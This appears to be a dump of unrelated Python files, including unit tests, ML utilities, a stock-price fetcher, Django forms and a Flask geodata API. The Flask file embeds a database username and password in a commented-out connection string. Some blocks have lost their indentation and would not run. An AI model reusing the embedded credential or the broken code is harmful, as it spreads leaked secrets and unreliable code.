        fun.assert_any_call('bar')  # most recently
        fun.assert_any_call('foo')  # ever called
        with self.assertRaisesRegex(AssertionError, re.escape(
                '''do_something_complicated('foobar') call not found''')):
            fun.assert_any_call('foobar')
    def test_has_calls(self):
        fun = self.obj.do_something_complicated
        fun(1); fun(2); fun(2); fun(3); fun(4); fun(5); fun(6); fun(7)
        # any_order=False: find the consecutive pattern
        fun.assert_has_calls([call(2), call(3), call(4)])
        with self.assertRaisesRegex(AssertionError, re.escape(
                '''Calls not found.\n'''
                '''Expected: [call(2), call(4), call(6)]\n'''
                '''Actual: [call(1), call(2), call(2), call(3), call(4), call(5), call(6), call(7)]''')):
            fun.assert_has_calls([call(2), call(4), call(6)])
        # any_order=True: ever called, regardless of order and times
        fun.assert_has_calls([call(4), call(2), call(6)], any_order=True)
        with self.assertRaisesRegex(AssertionError, re.escape(
                '''(call(0),) not all found in call list''')):
            fun.assert_has_calls([call(4), call(0), call(6)], any_order=True)
    def test_calls_as_tuples(self): pass  # TODO
    def test_mock_method_calls(self):
        mock = Mock()
        mock()
        mock.method().attribute.method()
        mock.attribute.method()
        # mock_calls: inclusive, recursive; split by '()', good for callable mocks.
        self.assertEqual(mock.mock_calls, [
            call(),
            call.method(),
            call.method().attribute.method(),
            call.attribute.method()])
        # method_calls: exclusive, recursive; terminated by '()', good for non-callable mocks.
        self.assertEqual(mock.method_calls, [call.method(), call.attribute.method()])
class NonCallableMockTest(unittest.TestCase): pass  # TODO: NonCallableMock (and NonCallableMagicMock) behaviours
class PropertyMockTest(unittest.TestCase): pass  # TODO: PropertyMock get/set recording
if __name__ == '__main__':
unittest.main()
|
import torch.nn as nn
def initialize_weights(*models):
    """Initialize the weights of every module in the given models, in place.

    Conv2d and Linear layers get Kaiming-normal weight init with zeroed
    biases; BatchNorm2d layers are reset to the identity affine transform
    (weight=1, bias=0). Other module types are left untouched.
    """
    for model in models:
        for module in model.modules():
            # isinstance with a tuple replaces the original chained `or`.
            if isinstance(module, (nn.Conv2d, nn.Linear)):
                nn.init.kaiming_normal_(module.weight)
                if module.bias is not None:
                    module.bias.data.zero_()
            elif isinstance(module, nn.BatchNorm2d):
                module.weight.data.fill_(1)
                module.bias.data.zero_()
|
# This is licensed under Apache-2.0 OR MIT |
from simfin.tools import account
class equalization(account):
    """Revenue account for equalization and Territorial Formula Financing (TFF).

    Each period the account value grows by a rate assembled from the enabled
    components (inflation, potential real GDP growth, population growth),
    with a floor of 3% growth.

    Parameters
    ----------
    value : float
        Starting revenue level.
    iprice : bool
        Include growth of the general price level (inflation).
    igdp : bool
        Include potential real GDP growth.
    ipop : bool
        Include population growth.
    others : any
        Accepted for interface compatibility; unused.
    """
    def __init__(self, value, iprice=True, igdp=True, ipop=False, others=None):
        self.value = value
        self.iprice = iprice
        self.igdp = igdp
        self.ipop = ipop

    def grow(self, macro, pop, eco, others=None):
        """Apply one period of growth to the account value (3% floor).

        `pop`, `eco` and `others` are accepted for interface compatibility
        but not used here; the rate comes from `macro` alone.
        """
        growth = 1.0
        if self.iprice:
            growth += macro.infl
        if self.igdp:
            growth += macro.gr_Yp
        if self.ipop:
            growth += macro.gr_N
        # Enforce the minimum 3% growth floor, then compound.
        self.value *= max(growth, 1.03)
|
#!/bin/env python3
# Author : freeman
# Date : 2021.03.25
# Desc : This software will export by default the past year STOCK price {high, low, open, close}
# : Financialmodelingprep doesnt have all the Class-C mutual fund types.
# : yet, it is the only site with API listngs of Cryptocurrencies.
# :
# use : python3 getStockData.py
# Version : 0.0.1
###################################################################
from datetime import datetime, timedelta
import warnings
import json
import sys
import os.path
from os import path
import socket
__NDAYS_AGO__ = 366
try:
from requests.exceptions import HTTPError
import requests
except ImportError as herr:
print("Missing requests library")
print("pip install --user requests")
try:
import urllib3
except ImportError as err:
warnings.warn('No Package named urllib3 was found. ', ImportWarning)
print(err.__class__.__name__ + " : " + err.__cause__)
sys.exit(1)
def testConn():
    """Return True if a TCP connection to www.google.com:80 succeeds, else False."""
    try:
        # Close the probe socket instead of leaking it (the original never closed it).
        socket.create_connection(("www.google.com", 80)).close()
        return True
    except OSError as err:
        # BUG FIX: err.errno is an int (or None); concatenating it to a str
        # raised TypeError in the original. str() it first.
        print("No Connection: " + str(err.errno))
        return False
def computeDate():
    """Return [today, today - __NDAYS_AGO__ days] as 'YYYY-MM-DD' strings."""
    now = datetime.now()
    earlier = now - timedelta(days=__NDAYS_AGO__)
    # str(datetime) is "YYYY-MM-DD HH:MM:SS..."; keep only the date part.
    return [str(now).split(' ')[0], str(earlier).split(' ')[0]]
# default: https://financialmodelingprep.com/api/v3/historical-price-full/AAPL?from=2020-03-01&to=2021-03-01&apikey=demo
def retrieveStockTickerInfo(t, s, e):
    """Download daily price history for ticker `t` between dates `s` and `e`
    (yyyy-mm-dd strings) from financialmodelingprep.com and dump the raw
    JSON payload to ./data.json.

    NOTE(review): with the placeholder KEY below this always exits(2) --
    a real API key must be pasted in before the function can run.
    """
    KEY = "YOUR_MODELING_PREDICTION_SITE_KEY"
    if KEY == "YOUR_MODELING_PREDICTION_SITE_KEY":
        print("You will need to setup and obtain an account before using this software")
        sys.exit(2)
    else:
        pass
    url = "https://financialmodelingprep.com/api/v3/historical-price-full/" + t.upper() + "?from=" + s + "&to=" + e + "&apikey=" + KEY
    try:
        r = requests.get(url=url)
        r.encoding = 'ISO-8859-1'
        r.raise_for_status()  # promote 4xx/5xx responses to HTTPError
        data = r.json()
    except HTTPError as err:
        print("Http Connection Error", err.response)
        sys.exit()
    # Pretty-print so the process* functions (and humans) can read it back.
    with open('data.json', 'w', encoding='utf-8') as f:
        json.dump(data, f, indent=4, sort_keys=True)
def processFields():
    """Parse ./data.json (financialmodelingprep historical prices) into four
    {date: price} dicts -- open, close, high, low -- ordered most-recent
    date first, each prefixed with a {"date": <field>} header entry.
    Prices are formatted to two decimals.

    BUG FIX: the original built the sorted close/high/low dicts from the
    *open* values (copy-paste of `sopen[k]`); each series now reads its own
    source dict.
    """
    with open('data.json', 'r') as f:
        ds = json.load(f)
    tds = ds['historical']

    def _collect(field):
        # One {date: "x.xx"} dict for `field`; a record missing the field
        # keeps the previous value ("" for the first), matching the
        # original's carry-over behaviour at record granularity.
        out = {}
        d, val = "", ""
        for rec in tds:
            for k, v in rec.items():
                key = str(k).strip().lower()
                if key == "date":
                    d = v
                if key == field:
                    val = "{:.2f}".format(v)
            out[d] = val
        return out

    sopen = _collect("open")
    sclose = _collect("close")
    shigh = _collect("high")
    slow = _collect("low")
    # Apparently, one OPEN key:value is blank in the source data -- drop it.
    for k in [k for k, v in sopen.items() if not v]:
        del sopen[k]
    # Sort each series with the most recent date first.
    so, sc, sh, sl = {}, {}, {}, {}
    for k in sorted(sopen, reverse=True):
        so[k] = sopen[k]
    for k in sorted(sclose, reverse=True):
        sc[k] = sclose[k]
    for k in sorted(shigh, reverse=True):
        sh[k] = shigh[k]
    for k in sorted(slow, reverse=True):
        sl[k] = slow[k]
    # Header entry first so the CSV writers emit a title row.
    so = {"date": "open", **so}
    sc = {"date": "close", **sc}
    sh = {"date": "high", **sh}
    sl = {"date": "low", **sl}
    return so, sc, sh, sl
def processFieldsRev():
    """Same as processFields() but sorted oldest date first (ascending),
    still prefixed with a {"date": <field>} header entry.

    BUG FIX: the original built the sorted close/high/low dicts from the
    *open* values (copy-paste of `sopen[k]`); each series now reads its own
    source dict.
    """
    with open('data.json', 'r') as f:
        ds = json.load(f)
    tds = ds['historical']

    def _collect(field):
        # One {date: "x.xx"} dict for `field`; a record missing the field
        # keeps the previous value ("" for the first).
        out = {}
        d, val = "", ""
        for rec in tds:
            for k, v in rec.items():
                key = str(k).strip().lower()
                if key == "date":
                    d = v
                if key == field:
                    val = "{:.2f}".format(v)
            out[d] = val
        return out

    sopen = _collect("open")
    sclose = _collect("close")
    shigh = _collect("high")
    slow = _collect("low")
    # Apparently, one OPEN key:value is blank in the source data -- drop it.
    for k in [k for k, v in sopen.items() if not v]:
        del sopen[k]
    # Sort each series oldest first (ascending date order).
    so, sc, sh, sl = {}, {}, {}, {}
    for k in sorted(sopen):
        so[k] = sopen[k]
    for k in sorted(sclose):
        sc[k] = sclose[k]
    for k in sorted(shigh):
        sh[k] = shigh[k]
    for k in sorted(slow):
        sl[k] = slow[k]
    # Header entry first so the CSV writers emit a title row.
    so = {"date": "open", **so}
    sc = {"date": "close", **sc}
    sh = {"date": "high", **sh}
    sl = {"date": "low", **sl}
    return so, sc, sh, sl
def writeToDisk(t, so, sc, sh, sl):
    """Write the open/close/high/low dicts for ticker `t` to four CSV files
    named <t>_open_data.csv, <t>_close_data.csv, <t>_high_data.csv and
    <t>_low_data.csv -- one 'key,value' row per dict entry.

    The original repeated the same write loop four times; it is factored
    into a single helper here (output is byte-identical).
    """
    def _dump(fname, series):
        # One row per entry: "<date>,<price>"
        with open(fname, "w", encoding='utf-8') as f:
            for k, v in series.items():
                f.write(str(k) + ',' + str(v) + "\n")
    _dump(t + "_open_data.csv", so)
    _dump(t + "_close_data.csv", sc)
    _dump(t + "_high_data.csv", sh)
    _dump(t + "_low_data.csv", sl)
def writeToDiskRev(t, so, sc, sh, sl):
    """Write the reverse-ordered open/close/high/low dicts for ticker `t` to
    four CSV files named <t>_<field>_data_rev.csv -- one 'key,value' row per
    dict entry.

    The original repeated the same write loop four times; it is factored
    into a single helper here (output is byte-identical).
    """
    def _dump(fname, series):
        # One row per entry: "<date>,<price>"
        with open(fname, "w", encoding='utf-8') as f:
            for k, v in series.items():
                f.write(str(k) + ',' + str(v) + "\n")
    _dump(t + "_open_data_rev.csv", so)
    _dump(t + "_close_data_rev.csv", sc)
    _dump(t + "_high_data_rev.csv", sh)
    _dump(t + "_low_data_rev.csv", sl)
def main():
    """Prompt for a ticker and an optional date range, fetch the price
    history and write the open/close/high/low CSVs (both sort orders).

    BUG FIX: the original's `elif` joined the negated emptiness checks with
    `or`, so it also accepted half-empty ranges (one date blank) and called
    the API with a blank date. The branch now requires BOTH dates.
    """
    ticker = input("Enter in a stock Ticker >> ").strip()
    start_date = input("Enter in a Start date in form yyyy-mm-dd or blank >> ").strip()
    end_date = input("Enter in a End date in form yyyy-mm-dd or blank >> ").strip()
    if not testConn():
        print("No Internet Connection, apparently.")
        return
    # After strip(), blank/whitespace-only input is simply the empty string.
    if not ticker:
        print("Ticker Field is Blank, where it must have a single Stock value !")
        sys.exit(1)

    def _fetch_and_write(s, e):
        # Fetch, then export both the newest-first and oldest-first CSV sets.
        retrieveStockTickerInfo(ticker, s, e)
        a, b, c, d = processFields()
        writeToDisk(ticker, a, b, c, d)
        a, b, c, d = processFieldsRev()
        writeToDiskRev(ticker, a, b, c, d)

    if not start_date and not end_date:
        # No range given: default to the past __NDAYS_AGO__ days.
        today, days_ago = computeDate()
        _fetch_and_write(days_ago, today)
    elif start_date and end_date:
        _fetch_and_write(start_date, end_date)
    else:
        # Exactly one date supplied -- ambiguous, refuse.
        print("idk")
        sys.exit(1)
|
from fastapi.testclient import TestClient
from depot_server.api import app
from depot_server.helper.auth import Authentication
from depot_server.model import BayInWrite, Bay
from tests.db_helper import clear_all
from tests.mock_auth import MockAuthentication, MockAuth
def test_bay(monkeypatch, motor_mock):
    """End-to-end CRUD test for the /api/v1/depot/bays endpoints:
    create (admin), list, get, update, delete, then verify the list is empty."""
    # Swap in the mock authentication so MockAuth credentials are honoured.
    monkeypatch.setattr(Authentication, '__call__', MockAuthentication.__call__)
    with TestClient(app) as client:
        clear_all()
        create_bay = BayInWrite(external_id='bay_1', name="Bay 1", description="Top Left")
        # Create requires the admin role.
        resp = client.post(
            '/api/v1/depot/bays', data=create_bay.json(), auth=MockAuth(sub='admin1', roles=['admin']),
        )
        assert resp.status_code == 201, resp.text
        created_bay = Bay.validate(resp.json())
        assert BayInWrite.validate(created_bay) == create_bay
        # Reads work for a plain authenticated user.
        resp = client.get('/api/v1/depot/bays', auth=MockAuth(sub='user1'))
        assert resp.status_code == 200, resp.text
        bays = [Bay.validate(b) for b in resp.json()]
        assert len(bays) == 1
        assert bays[0] == created_bay
        resp = client.get(f'/api/v1/depot/bays/{created_bay.id}', auth=MockAuth(sub='user1'))
        assert resp.status_code == 200, resp.text
        assert Bay.validate(resp.json()) == created_bay
        # Update (admin) and check the round-trip.
        update_bay = BayInWrite(external_id='bay_1_upd', name="Bay 1 Upd", description="Top Right")
        resp = client.put(
            f'/api/v1/depot/bays/{created_bay.id}', data=update_bay.json(), auth=MockAuth(sub='admin1', roles=['admin'])
        )
        assert resp.status_code == 200, resp.text
        updated_bay = Bay.validate(resp.json())
        assert BayInWrite.validate(updated_bay) == update_bay
        # Delete (admin), then the listing must be empty again.
        resp = client.delete(
            f'/api/v1/depot/bays/{created_bay.id}', auth=MockAuth(sub='admin1', roles=['admin'])
        )
        assert resp.status_code == 200, resp.text
        resp = client.get('/api/v1/depot/bays', auth=MockAuth(sub='user1'))
        assert resp.status_code == 200, resp.text
        assert len(resp.json()) == 0
|
"""
Radix Sort
In computer science, radix sort is a non-comparative integer sorting
algorithm that sorts data with integer keys by grouping keys by the
individual digits which share the same significant position and value.
A positional notation is required, but because integers can represent
strings of characters (e.g., names or dates) and specially formatted
floating point numbers, radix sort is not limited to integers.
Where does the name come from?
In mathematical numeral systems, the radix or base is the number of
unique digits, including the digit zero, used to represent numbers
in a positional numeral system. For example, a binary system
(using numbers 0 and 1) has a radix of 2 and a decimal system
(using numbers 0 to 9) has a radix of 10.
Efficiency
The topic of the efficiency of radix sort compared to other sorting
algorithms is somewhat tricky and subject to quite a lot of
misunderstandings. Whether radix sort is equally efficient,
less efficient or more efficient than the best comparison-based
algorithms depends on the details of the assumptions made.
Radix sort complexity is O(wn) for n keys which are integers
of word size w. Sometimes w is presented as a constant, which
would make radix sort better (for sufficiently large n) than
the best comparison-based sorting algorithms, which all perform
O(n log n) comparisons to sort n keys.
However, in general w cannot be considered a constant: if all n keys
are distinct, then w has to be at least log n for a random-access
machine to be able to store them in memory, which gives at best a
time complexity O(n log n). That would seem to make radix sort at
most equally efficient as the best comparison-based sorts
(and worse if keys are much longer than log n).
Best Average Worst Comments
n * k n * k n * k k - length of longest key
""" |
from django import forms
from django.contrib.auth.forms import UserChangeForm, PasswordChangeForm, UserCreationForm
from django.contrib.auth.models import User
from mainapp.models import Tickets, News, UserProfile
class NewsForm(forms.ModelForm):
    """Form for creating/editing a News item (title and text only)."""
    class Meta:
        model = News
        fields = (
            'title',
            'text',
        )

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Apply uniform Bootstrap styling and clear the default help texts.
        for field in self.fields.values():
            field.widget.attrs['class'] = 'form-control mt-2'
            field.widget.attrs['style'] = 'resize: none'
            field.help_text = ''
class SupportForm(forms.ModelForm):
    """Support-ticket form exposing only the message field, with Bootstrap
    styling and a Russian placeholder prompt."""
    class Meta:
        model = Tickets
        fields = (
            'message',
        )

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        for name, item in self.fields.items():
            item.widget.attrs['class'] = f'form-control {name} form-control'
            # Plain strings below: the original used f-strings with no
            # placeholders (identical runtime values).
            item.widget.attrs['style'] = 'resize: none'
            item.widget.attrs['placeholder'] = 'Опишите вашу проблему, как можно точнее.'
class CreateSupportForm(forms.ModelForm):
    """Ticket creation form: category, title and message."""
    class Meta:
        model = Tickets
        fields = (
            'category',
            'title',
            'message',
        )

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        for name, item in self.fields.items():
            item.widget.attrs['class'] = f'form-control {name} form-control'
            # Plain string: the original used an f-string with no placeholder.
            item.widget.attrs['style'] = 'resize: none'
class SupportFormAdmin(forms.ModelForm):
    """Admin-side ticket form: category, title, answer, status and desk."""
    class Meta:
        model = Tickets
        fields = (
            'category',
            'title',
            'answer',
            'status',
            'desk',
        )

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        for name, item in self.fields.items():
            item.widget.attrs['class'] = f'form-control {name} form-control'
            # Plain string: the original used an f-string with no placeholder.
            item.widget.attrs['style'] = 'resize: none'
class ChangeForm(UserChangeForm):
    """Self-service profile edit form; hides the read-only password field."""
    class Meta:
        model = User
        fields = ('username', 'first_name', 'last_name', 'email')

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        for field_name, field in self.fields.items():
            field.widget.attrs['class'] = 'form-control'
            field.help_text = ''
            # UserChangeForm includes a password hash display -- hide it.
            if field_name == 'password':
                field.widget = forms.HiddenInput()
class ChangeFormAdmin(UserChangeForm):
    """Admin-side user edit form including the permission flags."""
    class Meta:
        model = User
        fields = (
            'username',
            'first_name',
            'last_name',
            'email',
            'is_superuser',
            'is_staff',
            'is_active',
        )

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        for name, item in self.fields.items():
            item.widget.attrs['class'] = 'form-control'
            item.help_text = ''
            # Hide UserChangeForm's password hash display.
            if name == 'password':
                item.widget = forms.HiddenInput()
        # Hoisted out of the loop: the original re-applied these on every
        # iteration; the final widget classes are identical.
        for flag in ('is_superuser', 'is_staff', 'is_active'):
            self.fields[flag].widget.attrs.update({'class': 'checkbox_animated'})
class ChangePassword(PasswordChangeForm):
    """Password change form with Bootstrap styling."""
    # NOTE(review): PasswordChangeForm is not a ModelForm, so this inner Meta
    # is presumably ignored -- confirm before removing.
    class Meta:
        model = User
        fields = 'password'
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        for name, item in self.fields.items():
            item.widget.attrs['class'] = 'form-control'
    # NOTE(review): this looks copied from a view mixin -- a form has no
    # self.request or get_form_kwargs(); verify this method is ever called.
    def get_form(self, form_class):
        return form_class(self.request.user, **self.get_form_kwargs())
class RegisterFormAdmin(UserCreationForm):
    """Admin-side user creation form with permission flags; also creates an
    empty UserProfile for the new user on save."""
    class Meta:
        model = User
        fields = (
            'username',
            'first_name',
            'last_name',
            'password1',
            'password2',
            'email',
            'is_superuser',
            'is_staff',
            'is_active',
        )

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        for name, item in self.fields.items():
            item.widget.attrs['class'] = f'form-control {name}'
            item.help_text = ''
        # Hoisted out of the loop: the original re-applied these on every
        # iteration; the final widget classes are identical.
        for flag in ('is_superuser', 'is_staff', 'is_active'):
            self.fields[flag].widget.attrs.update({'class': 'checkbox_animated'})

    def save(self, commit=True):
        """Save the user and attach an empty UserProfile.

        NOTE(review): with commit=False the user has no primary key yet, so
        UserProfile.objects.create(user=user) would fail -- confirm callers
        always use commit=True.
        """
        user = super().save(commit=commit)
        UserProfile.objects.create(user=user)
        return user
|
from flask import Flask, request, render_template
from flask_pymongo import PyMongo
from CSVtogeoJSON import convert, panda_processing
from geojson import Feature, FeatureCollection, Point
import pandas as pd
import os
import json
from flask_restful import reqparse
# Install Redis to help with caching?
#from flask_cache import Cache
app = Flask(__name__, template_folder='templates')
#app.config['MONGO_URI'] = "mongodb://testuser:Transloc@transloccluster-shard-00-00-fwvjk.mongodb.net:27017,transloccluster-shard-00-01-fwvjk.mongodb.net:27017,transloccluster-shard-00-02-fwvjk.mongodb.net:27017/test?ssl=true&replicaSet=TranslocCluster-shard-0&authSource=admin&retryWrites=true"
#mongo = PyMongo(app)
@app.route('/')
def index():
    """Serve the landing page."""
    return render_template("index.html")
# if ./file/latlong.csv exists we can reuse that file jsonified
# otherwise we'll need to process the raw starting data
script_dir = os.path.dirname(__file__)
# Input: raw GeoLite2 CSV dropped into ./uploaded_data
starting_data_rel_path = "uploaded_data"
starting_data_abs_path = os.path.join(script_dir, starting_data_rel_path)
starting_data_file = starting_data_abs_path+'/'+"GeoLite2-City-Blocks-IPv4.csv"
# Output/cache: processed two-column (longitude,latitude) CSV
processed_data_rel_path = "static/files"
processed_data_abs_path = os.path.join(script_dir, processed_data_rel_path)
processed_data_file = processed_data_abs_path+'/'+"latlong.csv"
# Return all coordinates
#TODO look into returning in chunks
@app.route('/ipv4')
def ipv4():
    """Return every (longitude, latitude) record as JSON under key 'key'.

    Re-uses the cached latlong.csv when present; otherwise processes the raw
    GeoLite2 dump once and writes the cache for next time.
    """
    # Check if file exists first to avoid processing it again
    if (os.path.isfile(processed_data_file)):
        print ('Re-using existing file')
        #file exists, reuse it
        df = pd.read_csv(processed_data_file, names=['longitude','latitude'])
    else:
        print ('I\'m working on something new')
        df = panda_processing(starting_data_file)
        #TODO implement caching
        # Caching at this point would be ideal
        # for now write to file to ensure we only have to do this once
        df.to_csv(processed_data_file, index = False, header = False)
    df_to_json = {
        'key':df.to_dict(orient='records')
    }
    matching_results=json.dumps(df_to_json)
    return matching_results, 200
# Takes in top left and bottom right coordinates to create a box
# returns all coordinates within the created box
# Does not auto populate data
@app.route('/ipv4/box')
def box_coordinates():
    """Return all cached (longitude, latitude) points inside the bounding box
    given by the 'coords' query parameter: "tl_long,tl_lat,br_long,br_lat".
    """
    parser = reqparse.RequestParser()
    parser.add_argument('coords')
    # we now have a dict with in the form of {cords:a,b,c,d}
    args = parser.parse_args()
    # We only care about the values
    values = args.values()
    # NOTE(review): only the last value parsed in this loop survives; with a
    # single 'coords' argument that is fine, but verify if more args are added.
    for i in values:
        i = str(i)
        coords =i.split(',')
    # Basic error handling
    # Check that we have 4 coordinates
    if (len(coords) != 4):
        return 'Four coordinates are required', 400
    # Check that we didn't get passed an empty coordinate
    for test in coords:
        if not test:
            return 'Empty coordinate found', 400
    # Make the coordinates human readable
    tl_long = float(coords[0])
    tl_lat = float(coords[1])
    br_long = float(coords[2])
    br_lat = float(coords[3])
    # The box must have positive extent in both axes.
    if ((tl_long >= br_long) or (tl_lat >= br_lat)):
        return 'Invalid boundary', 400
    # Coordinates are now in the order of top left longitude, top left latitude
    # bottom right longitude, bottom right latitude
    if (os.path.isfile(processed_data_file)):
        df = pd.read_csv(processed_data_file, names=['longitude','latitude'])
        # Keep only points inside the box (inclusive bounds).
        df2 = df.loc[ (df['longitude'] >= tl_long)&
            (df['longitude'] <= br_long)&
            (df['latitude'] >= tl_lat)&
            (df['latitude'] <= br_lat)]
        # convert the dataframe back to a json type
        df_to_json = {
            'key':df2.to_dict(orient='records')
        }
        matching_results=json.dumps(df_to_json)
        return matching_results, 200
    else:
        return 'Data not loaded yet', 404
    # NOTE(review): unreachable -- both branches above return.
    return 'Unexpected error', 500
# Takes approximately 2m30s to process/convert full sized (~188Mb) dataset
@app.route('/upload/<string:file_to_process>', methods=['POST'])
def uploadNewCSV(file_to_process):
    """Convert the named uploaded CSV to geoJSON. POST only."""
    if (request.method == 'POST'):
        convert(file_to_process)
        # Below is used for creating a collection in mlab
        # geoData = convert(file_to_process)
        # Collection size is much to large for mlab
        # Need to look at GridFS
        #user = mongo.db.geo
        #user.insert(geoData)
        return "I got a file named " + file_to_process, 200
    else:
        # NOTE(review): unreachable -- the route only accepts POST.
        return "upload only supports the POST method", 400
if __name__ == '__main__':
app.run(debug=True) |
# Copyright (c) 2019 Karl Sundequist Blomdahl <karl.sundequist.blomdahl@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import numpy as np
import tensorflow as tf
from . import normalize_getting, conv2d, cast_to_compute_type
from .batch_norm import batch_norm_conv2d
from .dense import dense
from .recompute_grad import recompute_grad
from .orthogonal_initializer import orthogonal_initializer
def value_head(x, mode, params):
    """
    The value head attached after the residual blocks, in the spirit of the
    architecture described by DeepMind:

    1. A convolution of `num_samples` filters of kernel size 3 x 3 with
       stride 1 (NOTE(review): the original comment said 8 filters, but
       num_samples below is 2 -- confirm which is intended)
    2. Batch normalisation
    3. A relu non-linearity
    4. A fully connected linear layer that outputs a vector of size 1
    5. A tanh non-linearity outputting a scalar in the range [-1, 1]

    Returns three float32 tensors: the scalar value z, the per-point tanh
    map zo (361 values per example), and the raw head features y reshaped
    to [-1, 361, num_samples].
    """
    num_channels = params['num_channels']
    num_samples = 2
    def _forward(x, is_recomputing=False):
        """ Returns the result of the forward inference pass on `x` """
        y = batch_norm_conv2d(x, 'conv_1', (3, 3, num_channels, num_samples), mode, params, is_recomputing=is_recomputing)
        y = tf.nn.relu(y)
        # Per-point branch: 1x1 conv down to one channel, tanh to [-1, 1].
        zo = conv2d(y, 'conv_2', [1, 1, num_samples, 1])
        zo = tf.reshape(zo, [-1, 361])
        zo = tf.nn.tanh(zo)
        # Scalar value branch: dense layer over the flattened features with
        # a fixed empirical bias initializer (value_offset_op).
        z = tf.reshape(y, [-1, 361 * num_samples])
        z = dense(z, 'linear_2', (361 * num_samples, 1), value_offset_op, mode, params, is_recomputing=is_recomputing)
        z = tf.nn.tanh(z)
        return tf.cast(z, tf.float32), tf.cast(zo, tf.float32), tf.cast(tf.reshape(y, [-1, 361, num_samples]), tf.float32)
    return _forward(x)
def value_offset_op(shape, dtype=None, partition_info=None):
    """Bias initializer returning a fixed empirical offset.

    The signature follows TensorFlow's initializer protocol; `shape`,
    `dtype` and `partition_info` are accepted but not used.
    """
    offset = -0.00502319782
    return np.array([offset])
def ownership_loss(*, labels=None, logits=None):
    """Per-example softmax cross-entropy between ownership labels and logits.

    Labels in [-1, 1] are mapped to two-class probabilities
    [(1+x)/2, (1-x)/2]; logits to the pair [x, -x]. Label smoothing of 0.2
    is applied. Returns the per-example mean loss with shape [batch, 1].
    """
    categorical_labels = tf.stack([(1 + labels) / 2, (1 - labels) / 2], axis=2)
    categorical_logits = tf.stack([logits, -logits], axis=2)
    loss = tf.compat.v1.losses.softmax_cross_entropy(
        categorical_labels,
        categorical_logits,
        label_smoothing=0.2,
        reduction=tf.compat.v1.losses.Reduction.NONE
    )
    # Average over the point axis, keeping a [batch, 1] column.
    return tf.reduce_mean(input_tensor=loss, axis=[1], keepdims=True)
|
# Linear-regression walkthrough on the VehiclesItaly dataset:
# load, split, fit, plot, score, persist, then compare with Ridge.
filename = "VehiclesItaly.txt"
X = []
y = []
# Each line is "x,y": one feature value, one target value.
with open(filename, 'r') as f:
    for line in f.readlines():
        xt, yt = [float(i) for i in line.split(',')]
        X.append(xt)
        y.append(yt)
# Train/test split
# NOTE(review): the split is positional (first 80% / last 20%), not shuffled.
num_training = int(0.8 * len(X))
num_test = len(X) - num_training
import numpy as np
# Training data (sklearn expects a 2-D feature matrix, hence the reshape)
X_train = np.array(X[:num_training]).reshape((num_training,1))
y_train = np.array(y[:num_training])
# Test data
X_test = np.array(X[num_training:]).reshape((num_test,1))
y_test = np.array(y[num_training:])
# Create linear regression object
from sklearn import linear_model
linear_regressor = linear_model.LinearRegression()
# Train the model using the training sets
linear_regressor.fit(X_train, y_train)
# Predict the output
y_train_pred = linear_regressor.predict(X_train)
# Plot outputs
import matplotlib.pyplot as plt
plt.figure()
plt.scatter(X_train, y_train, color='green')
plt.plot(X_train, y_train_pred, color='black', linewidth=4)
plt.title('Training data')
plt.show()
y_test_pred = linear_regressor.predict(X_test)
plt.figure()
plt.scatter(X_test, y_test, color='green')
plt.plot(X_test, y_test_pred, color='black', linewidth=4)
plt.title('Test data')
plt.show()
# Measure performance
import sklearn.metrics as sm
print("Mean absolute error =", round(sm.mean_absolute_error(y_test, y_test_pred), 2))
print("Mean squared error =", round(sm.mean_squared_error(y_test, y_test_pred), 2))
print("Median absolute error =", round(sm.median_absolute_error(y_test, y_test_pred), 2))
print("Explain variance score =", round(sm.explained_variance_score(y_test, y_test_pred), 2))
print("R2 score =", round(sm.r2_score(y_test, y_test_pred), 2))
# Model persistence
import pickle
output_model_file = "3_model_linear_regr.pkl"
with open(output_model_file, 'wb') as f:
    pickle.dump(linear_regressor, f)
# Reload the pickled model and confirm it predicts the same.
with open(output_model_file, 'rb') as f:
    model_linregr = pickle.load(f)
y_test_pred_new = model_linregr.predict(X_test)
print("New mean absolute error =", round(sm.mean_absolute_error(y_test, y_test_pred_new), 2))
# Ridge regression (L2-regularized) for comparison.
ridge_regressor = linear_model.Ridge(alpha=0.01, fit_intercept=True, max_iter=10000)
ridge_regressor.fit(X_train, y_train)
y_test_pred_ridge = ridge_regressor.predict(X_test)
print( "Mean absolute error =", round(sm.mean_absolute_error(y_test, y_test_pred_ridge), 2))
print( "Mean squared error =", round(sm.mean_squared_error(y_test, y_test_pred_ridge), 2))
print( "Median absolute error =", round(sm.median_absolute_error(y_test, y_test_pred_ridge), 2))
print( "Explain variance score =", round(sm.explained_variance_score(y_test, y_test_pred_ridge), 2))
print( "R2 score =", round(sm.r2_score(y_test, y_test_pred_ridge), 2))
|
from __future__ import unicode_literals
import base64
import datetime
import hashlib
import hmac
from requests import Session
from requests.auth import AuthBase
import six
from six.moves.urllib import parse
from . import __version__, repo_url
from .exceptions import InvalidCredentials
class BelugaAPIAuth(AuthBase):
    """Attach BelugaCDN authentication to outgoing requests.

    Uses HMAC-SHA512 token signing when a token ID + secret pair is
    supplied, otherwise falls back to HTTP Basic auth with the given
    username + password.

    Raises:
